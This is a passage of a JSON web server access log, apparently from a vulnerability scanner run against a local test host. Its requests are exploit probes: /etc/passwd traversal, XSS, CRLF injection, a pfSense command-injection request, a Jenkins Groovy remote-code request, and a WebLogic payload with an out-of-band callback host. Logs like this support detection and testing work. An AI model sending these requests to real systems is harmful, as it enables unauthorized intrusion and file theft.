Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sfmc/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22option\x22\x0D\x0A\x0D\x0Acom_gmapfp\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22image1\x22; filename=\x22nuclei.html.gif\x22\x0D\x0AContent-Type: text/html\x0D\x0A\x0D\x0Aprojectdiscovery\x0D\x0A\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22no_html\x22\x0D\x0A\x0D\x0Ano_html\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.idea/dataSources.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /enginemanager/ftu/welcome.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /feed/rdf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\x5Cx3c\x5Cx3fphp+var_dump(md5(\x5Cx27CVE-2021-41282\x5Cx27));unlink(__FILE__)\x5Cx3b\x5Cx3f\x5Cx3e/;w+/usr/local/www/test.php%0a%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /authorization.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1_db.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?id=50&file=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Fexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /includes/.gitignore HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/host-manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22username\x22\x0D\x0A\x0D\x0A29KD1wWTCpAXMz2cd2Wgu9dCKuW\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22passconf\x22\x0D\x0A\x0D\x0ATesting1@\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22password\x22\x0D\x0A\x0D\x0ATesting1@\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22email\x22\x0D\x0A\x0D\x0Atest@29KD1wWTCpAXMz2cd2Wgu9dCKuW.tld\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22editid\x22\x0D\x0A\x0D\x0A\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22add\x22\x0D\x0A\x0D\x0Aadd\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22ulevelid\x22\x0D\x0A\x0D\x0A9\x0D\x0A--01b28e152ee044338224bf647275f8eb--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lib/crud/userprocess.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/downloads?fileName=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22option\x22\x0D\x0A\x0D\x0Acom_gmapfp\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22image1\x22; filename=\x22nuclei.html.gif\x22\x0D\x0AContent-Type: text/html\x0D\x0A\x0D\x0Aprojectdiscovery\x0D\x0A\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22no_html\x22\x0D\x0A\x0D\x0Ano_html\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /static/../../../a/../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A http://ca28fg0smpvbd3qg07h016e67fun1c7je.oast.live\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_debugbar/open?max=20&offset=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /localhost.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/authportal/bounce.php?url=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /www/delivery/afr.php?refresh=10000&\x22)',10000000);alert(1337);setTimeout('alert(\x22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0a/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"username=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /timesheet/login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /includes/mysql2i/mysql2i.func.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gateway/routes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?locale=en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SSI/index.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /druid/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.development.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uir//etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /img.php?f=/./etc/./passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", 